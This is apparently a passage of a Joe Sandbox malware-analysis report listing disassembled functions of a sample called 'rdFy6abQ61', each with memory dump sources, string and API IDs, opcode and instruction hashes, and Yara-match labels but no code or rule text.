                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: .
                                                                              • API String ID: 0-248832578
                                                                              • Opcode ID: f79fadad359256f9c8902d74d10a2b3d9a93aa70e8ce4c65eb9bac628b7d73f4
                                                                              • Instruction ID: 911296d1392f8c3c8cd6404ab6709485da162d277dd93cabcee5ac66b0687773
                                                                              • Opcode Fuzzy Hash: f79fadad359256f9c8902d74d10a2b3d9a93aa70e8ce4c65eb9bac628b7d73f4
                                                                              • Instruction Fuzzy Hash: 39A14B72E087618BC7109E28C98035BBBE1AB81310F698A7EDDD4B73D5DB389C458BC5
                                                                              Function 020E8817 Relevance: 1.6, Strings: 1, Instructions: 314COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_20e0000_rdFy6abQ61.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: .
                                                                              • API String ID: 0-248832578
                                                                              • Opcode ID: f79fadad359256f9c8902d74d10a2b3d9a93aa70e8ce4c65eb9bac628b7d73f4
                                                                              • Instruction ID: 6f5361a82d9f9e9de671177fd4b493300712ad1084c4201cf361fa26c80e04e1
                                                                              • Opcode Fuzzy Hash: f79fadad359256f9c8902d74d10a2b3d9a93aa70e8ce4c65eb9bac628b7d73f4
                                                                              • Instruction Fuzzy Hash: 3BA13A72E083614FCF118E28C89439AFBE1AB81314F59CA59DDD6A73A5E3349C859BC1
                                                                              Function 00444C20 Relevance: 1.6, Strings: 1, Instructions: 312COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID: Y\]R
                                                                              • API String ID: 2994545307-2023185185
                                                                              • Opcode ID: e368f69b4051d92f4704c4a144e7348ede97506515b2c153191350598cb49a47
                                                                              • Instruction ID: 32cb53c941d059e59dbce30d87d00b37379897002de2ab33e1c58f8979392959
                                                                              • Opcode Fuzzy Hash: e368f69b4051d92f4704c4a144e7348ede97506515b2c153191350598cb49a47
                                                                              • Instruction Fuzzy Hash: 6E910371A087118BE314CF29D89076BF7E2FBC5314F18862DE89597391DB79DC0A8786
                                                                              Function 02124E87 Relevance: 1.6, Strings: 1, Instructions: 312COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_20e0000_rdFy6abQ61.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Y\]R
                                                                              • API String ID: 0-2023185185
                                                                              • Opcode ID: 6f2147a5695bd4a53398488ea1253b7368f890971a7c40f09ff34ff683eb93e5
                                                                              • Instruction ID: 99217cf195a378f9d5264077a5d2046068a92f6f8247e44550b4d5a6ed26f5e4
                                                                              • Opcode Fuzzy Hash: 6f2147a5695bd4a53398488ea1253b7368f890971a7c40f09ff34ff683eb93e5
                                                                              • Instruction Fuzzy Hash: 9E91E0716483209BD318DF28D89076BB7E3EBC5314F188A2CF89997390DB759919CB82
                                                                              Function 0043B410 Relevance: 1.5, Strings: 1, Instructions: 299COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: <
                                                                              • API String ID: 0-4251816714
                                                                              • Opcode ID: 4cb474083ab1d720fa74cee5836e6e80a3847d91a69879083b1040dd856b60c3
                                                                              • Instruction ID: 298ed6161c937c0e6968453eb829229e96a7e3621a1d6b118fdfa9d8e411f9a2
                                                                              • Opcode Fuzzy Hash: 4cb474083ab1d720fa74cee5836e6e80a3847d91a69879083b1040dd856b60c3
                                                                              • Instruction Fuzzy Hash: 78D1B0216087C28ED726CB3C8844359BF91AB67224F0983D9D0E95F3D3C3698986C7E6
                                                                              Function 0041BA52 Relevance: 1.5, Strings: 1, Instructions: 293COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: x(m.
                                                                              • API String ID: 0-3038009362
                                                                              • Opcode ID: 2334306b3d1fa9529e9ef949cf5e5337414280495606308dda49b0f52e9ab68a
                                                                              • Instruction ID: 8fe95d6803831fae5c575aca5061d2950839e556567635e7946eadf65fb6b687
                                                                              • Opcode Fuzzy Hash: 2334306b3d1fa9529e9ef949cf5e5337414280495606308dda49b0f52e9ab68a
                                                                              • Instruction Fuzzy Hash: F27128B2A083108BD3248F25C4D03A7B7E1EFDA314F19595DE8C66B391E7788945C7D6
                                                                              Function 020FBCB9 Relevance: 1.5, Strings: 1, Instructions: 293COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_20e0000_rdFy6abQ61.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: x(m.
                                                                              • API String ID: 0-3038009362
                                                                              • Opcode ID: 55679c1ab79aa0cc9e8bd8632c0c6d17a464fbc66da0cad8c1dcaab4c2fdadcb
                                                                              • Instruction ID: 4abc9576d0aebcbab10e830ca66bfe4ad776fc181f7203997bf824be8eafd510
                                                                              • Opcode Fuzzy Hash: 55679c1ab79aa0cc9e8bd8632c0c6d17a464fbc66da0cad8c1dcaab4c2fdadcb
                                                                              • Instruction Fuzzy Hash: 487148B2A483508BD364CF24C4D076BB7F1EFDA318F195A1CE9C66B691E7758805CB82
                                                                              Function 00406120 Relevance: 1.5, Strings: 1, Instructions: 265COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: ,
                                                                              • API String ID: 0-3772416878
                                                                              • Opcode ID: 0e374678804395dc01eb8fefaf4987f3ffbc266451ec095f969c6d68de8c5adc
                                                                              • Instruction ID: 9057347cd236a3d55169ab5d420f90e4f8a8bfd1e184600247eeff6d96e402e7
                                                                              • Opcode Fuzzy Hash: 0e374678804395dc01eb8fefaf4987f3ffbc266451ec095f969c6d68de8c5adc
                                                                              • Instruction Fuzzy Hash: 04B139712083819FD325CF18C88061BFBE0AFA9704F484E6DE5D997782D635E918CBA7
                                                                              Function 00444950 Relevance: 1.5, Strings: 1, Instructions: 257COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: qVol
                                                                              • API String ID: 0-1016533244
                                                                              • Opcode ID: a4f124c9ac02752dc567efe38763db5f0b81abf009628bda67d4b8c7e599d092
                                                                              • Instruction ID: 3822851cd43ddfd6e2ae3d15aa8c6b5369446e8c252419fc1ba6ad4511229b5c
                                                                              • Opcode Fuzzy Hash: a4f124c9ac02752dc567efe38763db5f0b81abf009628bda67d4b8c7e599d092
                                                                              • Instruction Fuzzy Hash: B181FE752087458BD724CF28D880B6BB3F1FB85354F19812DEA958B3A1EB35EC11C74A
                                                                              Function 02124BB7 Relevance: 1.5, Strings: 1, Instructions: 257COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_20e0000_rdFy6abQ61.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: qVol
                                                                              • API String ID: 0-1016533244
                                                                              • Opcode ID: bab27bdf19bf43604da4d2719dc478bcee0a316a956e87a0dcfafb43d41436d0
                                                                              • Instruction ID: 2a81e873fbbab70bbb9da1d05b6d4b9d70a15c49e6b56ae010b5238b8edfb2ef
                                                                              • Opcode Fuzzy Hash: bab27bdf19bf43604da4d2719dc478bcee0a316a956e87a0dcfafb43d41436d0
                                                                              • Instruction Fuzzy Hash: C981D2756443158FC724DF28C890A6AB3F2FF85714F15812CF9958B3A1E732E869CB42
                                                                              Function 004180F0 Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: gfff
                                                                              • API String ID: 0-1553575800
                                                                              • Opcode ID: 3bf142fd8a215ea0c64be45187437800715a7ca7fa3f03cb850da3ccfabd6cc7
                                                                              • Instruction ID: 92e196d3d9e6bda93a0c7e2106ea41e010bf6410d3e766de811087e40ead5107
                                                                              • Opcode Fuzzy Hash: 3bf142fd8a215ea0c64be45187437800715a7ca7fa3f03cb850da3ccfabd6cc7
                                                                              • Instruction Fuzzy Hash: 6291C5B1A086429FC714CB29C4917ABFBD29BD5304F18892EE4D9C7352E739DC85CB86
                                                                              Function 020F8357 Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_20e0000_rdFy6abQ61.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: gfff
                                                                              • API String ID: 0-1553575800
                                                                              • Opcode ID: 6ceb0d1c140525c60d7b3d2d9bab67d25452a9bb47d8311bc79918efc40535ca
                                                                              • Instruction ID: ddf61fca3ada7dc617fd8e55269facb4449c1442fc92c648d8efbd00d1b7a849
                                                                              • Opcode Fuzzy Hash: 6ceb0d1c140525c60d7b3d2d9bab67d25452a9bb47d8311bc79918efc40535ca
                                                                              • Instruction Fuzzy Hash: CB91C3B15483428FC759CF28C4916ABBBE2AFD4204F18CA2DE5D987751E339E845DB82
                                                                              Function 0042AFB0 Relevance: 1.5, Strings: 1, Instructions: 222COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: q
                                                                              • API String ID: 0-3900047139
                                                                              • Opcode ID: 6b5437a597b224c58c18eff0cd7f9e1b12adb8a3c204c60dfaa919d9716313ac
                                                                              • Instruction ID: bfd71d5ee42355939c062a028dadac58486c6c85aba871825f936092bfaa215d
                                                                              • Opcode Fuzzy Hash: 6b5437a597b224c58c18eff0cd7f9e1b12adb8a3c204c60dfaa919d9716313ac
                                                                              • Instruction Fuzzy Hash: AC5103B4604310CBD7209F24E85176B73E1FF85318F54456DE9898B3A1E739D92ACB8B
                                                                              Function 0041D8B0 Relevance: 1.5, Strings: 1, Instructions: 202COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: >
                                                                              • API String ID: 0-325317158
                                                                              • Opcode ID: f1bc986dabf3978d0cb1bf79de7b73276bda3729ec1d8848391f1f4d6f7e9591
                                                                              • Instruction ID: f78e35e26b24cf68e4bc09e6cd2b7899b815de8684f97abc49024c1dd2b64b0c
                                                                              • Opcode Fuzzy Hash: f1bc986dabf3978d0cb1bf79de7b73276bda3729ec1d8848391f1f4d6f7e9591
                                                                              • Instruction Fuzzy Hash: D76127B3A5D6D04BD3258A3C4C613EA6A930FA7330F2D87AAE8F5873E1D15D8C469345
                                                                              Function 020FDB17 Relevance: 1.5, Strings: 1, Instructions: 202COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_20e0000_rdFy6abQ61.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: >
                                                                              • API String ID: 0-325317158
                                                                              • Opcode ID: f1bc986dabf3978d0cb1bf79de7b73276bda3729ec1d8848391f1f4d6f7e9591
                                                                              • Instruction ID: f9944c6e61b0f49e68fb82cb05b4e6ff0b116da0c9c59cc64c1fac7e55ab1ce0
                                                                              • Opcode Fuzzy Hash: f1bc986dabf3978d0cb1bf79de7b73276bda3729ec1d8848391f1f4d6f7e9591
                                                                              • Instruction Fuzzy Hash: B961562768D7D04BD3298A3C4C613AABA930BD3234F2D87B9E6F5877E1D2598805D381
                                                                              Function 00418492 Relevance: 1.4, Strings: 1, Instructions: 158COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: (
                                                                              • API String ID: 0-3887548279
                                                                              • Opcode ID: ee7fa4accd31e59d0910d8aa9e7224e6b0750909148df57fa657f99ce6b3dc18
                                                                              • Instruction ID: 2caae83b2d4013721f210141ccc417c30349dd5d0901d4fb7f3c841e3804c493
                                                                              • Opcode Fuzzy Hash: ee7fa4accd31e59d0910d8aa9e7224e6b0750909148df57fa657f99ce6b3dc18
                                                                              • Instruction Fuzzy Hash: E851DE74109780DFDB209F24D859BABB7E5FF92314F09096DE4C98B2A1EB388514CB5B
                                                                              Function 00417054 Relevance: 1.4, Strings: 1, Instructions: 146COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: rA
                                                                              • API String ID: 0-3688822144
                                                                              • Opcode ID: 0fecef19979ae2520a6d41ae5022304e5fe91d9e10e30bf12275cb775264daa6
                                                                              • Instruction ID: eea7f0b4564a115e112266a705f564882217ee49f10fc6db0b082ff3a9467cbb
                                                                              • Opcode Fuzzy Hash: 0fecef19979ae2520a6d41ae5022304e5fe91d9e10e30bf12275cb775264daa6
                                                                              • Instruction Fuzzy Hash: 21410B3565C7824BD336CE7984903ABBBD2ABC6310F0C8A7D94D197785DE7CC8468752
                                                                              Function 0210AF50 Relevance: 1.4, Strings: 1, Instructions: 146COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_20e0000_rdFy6abQ61.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: q
                                                                              • API String ID: 0-3900047139
                                                                              • Opcode ID: 673c11ed654b93604eb6ab5b56a9e698777ccd58af881acd39c106462716c5a1
                                                                              • Instruction ID: d67e7dada27ce1166ccf0eb5e44d23a0e3f85ac5b5545703d2a6ba7d27a42617
                                                                              • Opcode Fuzzy Hash: 673c11ed654b93604eb6ab5b56a9e698777ccd58af881acd39c106462716c5a1
                                                                              • Instruction Fuzzy Hash: F041DAB45483018BC720DF24C491B6BB7F1FF82358F048A4CE5958B3A4E7B98606CB87
                                                                              Function 020ED3D9 Relevance: 1.4, Strings: 1, Instructions: 132COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_20e0000_rdFy6abQ61.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 301V
                                                                              • API String ID: 0-2749669040
                                                                              • Opcode ID: 833df5a93a9dfcddf4f429d08c48422bb21d6f1f0a3d624069caf29e04340d04
                                                                              • Instruction ID: b883c6af82268f00ed795242ae70fac8ef5344bf3296e8476700297429a14e3d
                                                                              • Opcode Fuzzy Hash: 833df5a93a9dfcddf4f429d08c48422bb21d6f1f0a3d624069caf29e04340d04
                                                                              • Instruction Fuzzy Hash: 8541BF752483118FD728DF54C8A4B6BB7F5FFC5308F08892CE4864B255E3B59648DB46
                                                                              Function 00442DCA Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: UUK
                                                                              • API String ID: 0-1743445028
                                                                              • Opcode ID: 64f8c97061e85143dd2bf9607cc879b83cd40bcdd4eb5dc80a7e8408e6d4f248
                                                                              • Instruction ID: e9b7a210428eddec2d32ba3198370ee38b37a834245a60ff4a0e95a4beb386be
                                                                              • Opcode Fuzzy Hash: 64f8c97061e85143dd2bf9607cc879b83cd40bcdd4eb5dc80a7e8408e6d4f248
                                                                              • Instruction Fuzzy Hash: D14106322087504BD31CCF38D9A132BFBD7AB85314F5A856ED0868B791D6B999058B89
                                                                              Function 004421E9 Relevance: 1.3, Strings: 1, Instructions: 96COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: "c_
                                                                              • API String ID: 0-1905016733
                                                                              • Opcode ID: 54f33eb4d3c200ec803ec730c350af6742ffe7018a8b1e5f7191d90e9f16e4db
                                                                              • Instruction ID: 139d9a56c6b22736b00f81c9c0a59650492495ee9bcb90bc8dd56261b9d87cf4
                                                                              • Opcode Fuzzy Hash: 54f33eb4d3c200ec803ec730c350af6742ffe7018a8b1e5f7191d90e9f16e4db
                                                                              • Instruction Fuzzy Hash: 7331F172E055018FC319CF2CC8623A6FBA2FB59308F19D12CC555A7796C7B9A80A8B84
                                                                              Function 0041B58F Relevance: 1.3, Strings: 1, Instructions: 79COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: %
                                                                              • API String ID: 0-2567322570
                                                                              • Opcode ID: 2611800c88671bb526049112999962ec915228d777db172c398fa2dfb9493879
                                                                              • Instruction ID: fc55fbf2e67d6e55d69b8bdcc21a86b947583cb7b9fc2e15381c79fb32be4bbc
                                                                              • Opcode Fuzzy Hash: 2611800c88671bb526049112999962ec915228d777db172c398fa2dfb9493879
                                                                              • Instruction Fuzzy Hash: 492125315583508FD3248F24C854B6ABBE0EF9A318F084A5EE4D5EB392C379C945CB8B
                                                                              Function 020FB7F6 Relevance: 1.3, Strings: 1, Instructions: 79COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_20e0000_rdFy6abQ61.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: %
                                                                              • API String ID: 0-2567322570
                                                                              • Opcode ID: 4d24bd78338286888f8d211ca0a5dc873c79f3b924ede333e2a7dd3152c8cbc9
                                                                              • Instruction ID: 9afa1e46bb7400312ae07a624e6cea43cd59506ab6710e059aef99d57f390103
                                                                              • Opcode Fuzzy Hash: 4d24bd78338286888f8d211ca0a5dc873c79f3b924ede333e2a7dd3152c8cbc9
                                                                              • Instruction Fuzzy Hash: 152137316983508FD3548F24C854B2ABBE0AF8A31CF484A5DE4D5EB791C379C946CB46
                                                                              Function 00427FFD Relevance: 1.3, Strings: 1, Instructions: 67COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: UZW
                                                                              • API String ID: 0-4101217444
                                                                              • Opcode ID: 214fb597cb98695a4d45f46ce28af4813d836258ed31ce56576b7396067f434c
                                                                              • Instruction ID: beb92d7dceb5f7ee2bc2359878695b6a9a5b74cab8484de6a3c22e177f9b20e4
                                                                              • Opcode Fuzzy Hash: 214fb597cb98695a4d45f46ce28af4813d836258ed31ce56576b7396067f434c
                                                                              • Instruction Fuzzy Hash: 2D21E7706093618BD7209F65E89577FB7E1EF92308F44082EE5C187252EB7DC806CB5A
                                                                              Function 02108264 Relevance: 1.3, Strings: 1, Instructions: 67COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_20e0000_rdFy6abQ61.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: UZW
                                                                              • API String ID: 0-4101217444
                                                                              • Opcode ID: 214fb597cb98695a4d45f46ce28af4813d836258ed31ce56576b7396067f434c
                                                                              • Instruction ID: c5038677321537655114d70b44744d004d5ddc6fef92d551e92d91e9f05e5ec5
                                                                              • Opcode Fuzzy Hash: 214fb597cb98695a4d45f46ce28af4813d836258ed31ce56576b7396067f434c
                                                                              • Instruction Fuzzy Hash: 08219FB040C3448BDB20AF64889176BB7E5EF92314F09083EE592872D1E7B9C401CB16
                                                                              Function 02108677 Relevance: 1.3, Strings: 1, Instructions: 48COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_20e0000_rdFy6abQ61.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: #C}
                                                                              • API String ID: 0-275300757
                                                                              • Opcode ID: 54d830f3108b5f410fe416606f389226582127205c1caaec64cd793ee302cd76
                                                                              • Instruction ID: 85896d1aede11f76443ea156dd0dfddbb65bcd48101da94535102ff9d7a967db
                                                                              • Opcode Fuzzy Hash: 54d830f3108b5f410fe416606f389226582127205c1caaec64cd793ee302cd76
                                                                              • Instruction Fuzzy Hash: B811CE764883058BD318DF19C4816ABFBE5BBE1304F15192DF19687258CB71D3498B8B
                                                                              Function 020F886C Relevance: 1.3, Strings: 1, Instructions: 40COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_20e0000_rdFy6abQ61.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: (
                                                                              • API String ID: 0-3887548279
                                                                              • Opcode ID: a77fa76463edf9bf5d8da47d9c40e08e56a16df71608e8171255b894610df72f
                                                                              • Instruction ID: 2be13f725d364567d9a493c887d64a8f302611e4a5132fbeab5c0bc9ee33af1d
                                                                              • Opcode Fuzzy Hash: a77fa76463edf9bf5d8da47d9c40e08e56a16df71608e8171255b894610df72f
                                                                              • Instruction Fuzzy Hash: 6F1135B010D3808FE7329F24944DB9FBBE9BB92314F584D6CC4C99A295EB358018CB43
                                                                              Function 020FFC07 Relevance: .8, Instructions: 771COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_20e0000_rdFy6abQ61.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 8cc1b13c1102e30db294b922f2599dfa790129c5d8f004719a222694663e08f2
                                                                              • Instruction ID: 3ee17879c6430fb424eac1b3a05b1f5a0be824aa5d9273b7b01cfc88d52e3255
